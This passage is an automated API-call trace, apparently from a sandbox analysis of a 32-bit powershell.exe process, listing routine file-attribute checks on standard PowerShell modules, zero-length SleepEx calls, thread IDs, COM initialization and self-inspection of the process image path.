0x0 [0163.520] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0163.563] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0163.566] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0169.428] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1")) returned 0x20 [0169.428] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\PnpDevice\\PnpDevice.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\pnpdevice\\pnpdevice.psd1")) returned 0x20 [0169.463] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\VpnClient\\VpnClient.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\vpnclient\\vpnclient.psd1")) returned 0x20 [0169.465] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob\\PSScheduledJob.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psscheduledjob\\psscheduledjob.psd1")) returned 0x20 [0169.465] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration\\PSDesiredStateConfiguration.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psdesiredstateconfiguration\\psdesiredstateconfiguration.psd1")) returned 0x20 [0169.467] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsErrorReporting\\WindowsErrorReporting.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\windowserrorreporting\\windowserrorreporting.psd1")) returned 0x20 [0169.471] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets\\CimCmdlets.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\cimcmdlets\\cimcmdlets.psd1")) returned 0x20 [0169.473] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\MsDtc\\MsDtc.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\msdtc\\msdtc.psd1")) returned 0x20 [0169.475] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetTCPIP\\NetTCPIP.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\nettcpip\\nettcpip.psd1")) returned 0x20 [0169.477] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE\\ISE.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\ise\\ise.psd1")) returned 0x20 [0169.478] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\psreadline.psd1")) returned 0x20 [0169.478] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\BranchCache\\BranchCache.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\branchcache\\branchcache.psd1")) returned 0x20 [0169.480] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\Microsoft.PowerShell.Diagnostics.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.diagnostics\\microsoft.powershell.diagnostics.psd1")) returned 0x20 [0169.481] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Storage\\Storage.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\storage\\storage.psd1")) returned 0x20 [0169.483] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetQos\\NetQos.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netqos\\netqos.psd1")) returned 0x20 [0169.483] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetAdapter\\NetAdapter.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netadapter\\netadapter.psd1")) returned 0x20 [0169.485] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\DirectAccessClientComponents\\DirectAccessClientComponents.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\directaccessclientcomponents\\directaccessclientcomponents.psd1")) returned 0x20 [0169.488] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsUpdate\\WindowsUpdate.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\windowsupdate\\windowsupdate.psd1")) returned 0x20 [0169.488] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkTransition\\NetworkTransition.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\networktransition\\networktransition.psd1")) returned 0x20 [0169.531] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\pester\\3.4.0\\pester.psd1")) returned 0x20 [0169.532] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\ScheduledTasks\\ScheduledTasks.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\scheduledtasks\\scheduledtasks.psd1")) returned 0x20 [0169.537] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetConnection\\NetConnection.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netconnection\\netconnection.psd1")) returned 0x20 [0169.539] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\iSCSI\\iSCSI.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\iscsi\\iscsi.psd1")) returned 0x20 [0169.539] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkConnectivityStatus\\NetworkConnectivityStatus.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\networkconnectivitystatus\\networkconnectivitystatus.psd1")) returned 0x20 [0169.542] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\pester.psm1")) returned 0x20 [0169.628] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSwitchTeam\\NetSwitchTeam.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netswitchteam\\netswitchteam.psd1")) returned 0x20 [0169.630] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\microsoft.powershell.operation.validation\\1.0.1\\microsoft.powershell.operation.validation.psd1")) returned 0x20 [0169.630] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.4.0\\pester.psm1")) returned 0x20 [0169.631] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetLbfo\\NetLbfo.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netlbfo\\netlbfo.psd1")) returned 0x20 [0169.633] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\TLS\\TLS.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\tls\\tls.psd1")) returned 0x20 [0169.633] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psdiagnostics\\psdiagnostics.psd1")) returned 0x20 [0169.634] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSModule.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\psmodule.psm1")) returned 0x20 [0169.635] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psm1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\pester\\3.4.0\\pester.psm1")) returned 0x20 [0169.635] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker\\AppLocker.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\applocker\\applocker.psd1")) returned 0x20 [0169.636] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.operation.validation\\1.0.1\\microsoft.powershell.operation.validation.psd1")) returned 0x20 [0169.636] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\TrustedPlatformModule\\TrustedPlatformModule.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\trustedplatformmodule\\trustedplatformmodule.psd1")) returned 0x20 [0169.636] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\troubleshootingpack\\troubleshootingpack.psd1")) returned 0x20 [0169.637] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\UEV\\UEV.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\uev\\uev.psd1")) returned 0x20 [0169.637] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\microsoft.powershell.odatautils.psd1")) returned 0x20 [0169.638] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\EventTracingManagement\\EventTracingManagement.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\eventtracingmanagement\\eventtracingmanagement.psd1")) returned 0x20 [0169.640] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\pester\\3.3.5\\pester.psd1")) returned 0x20 [0169.641] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Dism\\Dism.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\dism\\dism.psd1")) returned 0x20 [0169.641] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.security\\microsoft.powershell.security.psd1")) returned 0x20 [0169.641] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1")) returned 0x20 [0169.641] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsDeveloperLicense\\WindowsDeveloperLicense.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\windowsdeveloperlicense\\windowsdeveloperlicense.psd1")) returned 0x20 [0169.641] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Wdac\\Wdac.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\wdac\\wdac.psd1")) returned 0x20 [0169.643] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppvClient\\AppvClient.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appvclient\\appvclient.psd1")) returned 0x20 [0169.645] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSecurity\\NetSecurity.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netsecurity\\netsecurity.psd1")) returned 0x20 [0169.647] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psm1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\pester\\3.3.5\\pester.psm1")) returned 0x20 [0169.647] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.management.psd1")) returned 0x20 [0169.647] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSModule.psm1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\1.0.0.1\\psmodule.psm1")) returned 0x20 [0169.647] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\Microsoft.PowerShell.Host.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.host\\microsoft.powershell.host.psd1")) returned 0x20 [0169.648] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetNat\\NetNat.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netnat\\netnat.psd1")) returned 0x20 [0169.652] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.2\\psreadline.psd1")) returned 0x20 [0169.652] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadLine.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.2\\psreadline.psm1")) returned 0x20 [0169.652] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadLine.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\psreadline.psm1")) returned 0x20 [0169.653] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1")) returned 0x20 [0169.653] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\PrintManagement\\PrintManagement.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\printmanagement\\printmanagement.psd1")) returned 0x20 [0169.655] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\DnsClient\\DnsClient.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\dnsclient\\dnsclient.psd1")) returned 0x20 [0169.657] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx\\Appx.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appx\\appx.psd1")) returned 0x20 [0169.657] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\pester.psd1")) returned 0x20 [0169.657] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.4.0\\pester.psd1")) returned 0x20 [0169.657] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetEventPacketCapture\\NetEventPacketCapture.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\neteventpacketcapture\\neteventpacketcapture.psd1")) returned 0x20 [0169.659] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\bitstransfer\\bitstransfer.psd1")) returned 0x20 [0169.659] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\PKI\\PKI.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\pki\\pki.psd1")) returned 0x20 [0169.659] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management\\Microsoft.WSMan.Management.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.wsman.management\\microsoft.wsman.management.psd1")) returned 0x20 [0169.660] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\International\\International.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\international\\international.psd1")) returned 0x20 [0169.660] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Kds\\Kds.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\kds\\kds.psd1")) returned 0x20 [0169.660] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsErrorReporting\\WindowsErrorReporting.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\windowserrorreporting\\windowserrorreporting.psm1")) returned 0x20 [0169.661] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1")) returned 0x20 [0169.661] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1")) returned 0x20 [0169.661] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\Microsoft.PowerShell.Archive.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.archive\\microsoft.powershell.archive.psd1")) returned 0x20 [0169.661] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\SecureBoot\\SecureBoot.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\secureboot\\secureboot.psd1")) returned 0x20 [0169.666] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0169.755] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0169.816] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0169.869] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0169.969] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0170.029] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0170.081] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0170.129] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0170.248] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0170.305] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0170.351] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0170.438] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0170.503] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0170.560] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0170.606] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0170.629] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0170.703] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0170.780] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0170.844] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0170.886] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0171.019] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0171.070] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0171.117] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0171.270] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0171.318] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0171.360] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0171.431] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0171.468] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0171.517] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0171.579] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0171.625] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0171.684] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0171.722] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0171.794] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0171.855] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0171.905] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0171.948] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0171.999] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0172.163] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0172.273] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0172.288] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0172.301] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0172.306] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0172.319] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0172.328] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0172.351] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0172.407] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0172.467] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0172.477] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0172.480] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0172.540] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0172.619] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0172.711] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0175.289] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0175.350] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0175.412] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0175.438] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0175.446] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0175.464] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0175.467] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0175.490] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0175.494] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0175.500] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0175.527] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0175.632] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0175.690] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0175.711] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0175.716] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0175.724] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0175.744] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0175.752] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0175.754] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0175.766] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0175.773] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0175.777] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0175.789] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0175.839] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0175.852] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 Thread: id = 79 os_tid = 0x13bc Thread: id = 80 os_tid = 0x13a0 Thread: id = 81 os_tid = 0x13b0 Thread: id = 82 os_tid = 0x1398 [0130.207] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0130.207] CoGetContextToken (in: pToken=0x755fb74 | out: pToken=0x755fb74) returned 0x0 [0130.207] CObjectContext::QueryInterface () returned 0x0 [0130.207] CObjectContext::GetCurrentThreadType () returned 0x0 [0130.207] Release () returned 0x0 [0130.208] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1 [0130.208] CoUninitialize () [0130.208] RoInitialize () returned 0x1 [0130.208] RoUninitialize () returned 0x0 [0130.693] GetCurrentProcessId () returned 0x514 [0130.693] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x514) returned 0x614 [0130.693] EnumProcessModules (in: hProcess=0x614, lphModule=0x511922c, cb=0x100, lpcbNeeded=0x755f68c | out: lphModule=0x511922c, lpcbNeeded=0x755f68c) returned 1 [0130.694] GetModuleInformation (in: hProcess=0x614, hModule=0x13b0000, lpmodinfo=0x511936c, cb=0xc | out: lpmodinfo=0x511936c*(lpBaseOfDll=0x13b0000, SizeOfImage=0x6c000, EntryPoint=0x13b95f0)) returned 1 [0130.694] CoTaskMemAlloc (cb=0x804) returned 0x135f8d0 [0130.694] GetModuleBaseNameW (in: hProcess=0x614, hModule=0x13b0000, lpBaseName=0x135f8d0, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe [0130.694] CoTaskMemFree (pv=0x135f8d0) [0130.694] CoTaskMemAlloc (cb=0x804) returned 0x135f8d0 [0130.694] GetModuleFileNameExW (in: hProcess=0x614, hModule=0x13b0000, lpFilename=0x135f8d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0130.694] CoTaskMemFree (pv=0x135f8d0) [0130.694] CloseHandle (hObject=0x614) returned 1 [0130.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x104, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39 [0130.695] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x755f60c) returned 1 [0130.695] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: 